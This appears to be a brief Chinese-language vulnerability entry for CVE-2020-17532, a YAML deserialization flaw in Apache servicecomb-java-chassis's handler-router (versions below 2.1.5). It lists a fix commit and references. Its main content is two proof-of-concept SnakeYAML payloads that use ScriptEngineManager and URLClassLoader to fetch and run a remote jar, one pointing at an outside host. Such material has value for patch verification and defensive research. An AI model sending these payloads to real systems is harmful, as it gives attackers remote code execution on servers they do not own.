跳转至

CVE-2020-17532 Apache servicecomb-java-chassis Yaml 反序列化漏洞

在servicecomb-java-chassis中启用处理程序-路由器组件时,经过身份验证的用户可能会注入一些数据并导致任意代码执行。

commit:

https://github.com/apache/servicecomb-java-chassis/commit/839a52e27c754cb5ce14f20063902f21065bd26c

影响版本:< 2.1.5

PoC:

!!javax.script.ScriptEngineManager [!!java.net.URLClassLoader [[!!java.net.URL ["http://127.0.0.1/"]]]]

!!javax.script.ScriptEngineManager [
  !!java.net.URLClassLoader [[
    !!java.net.URL ["http://artsploit.com/yaml-payload.jar"]
  ]]
]

ref:

  • https://github.com/apache/servicecomb-java-chassis/commit/839a52e27c754cb5ce14f20063902f21065bd26c
  • https://seclists.org/oss-sec/2021/q1/60
  • https://forum.ywhack.com/thread-115020-1-1.html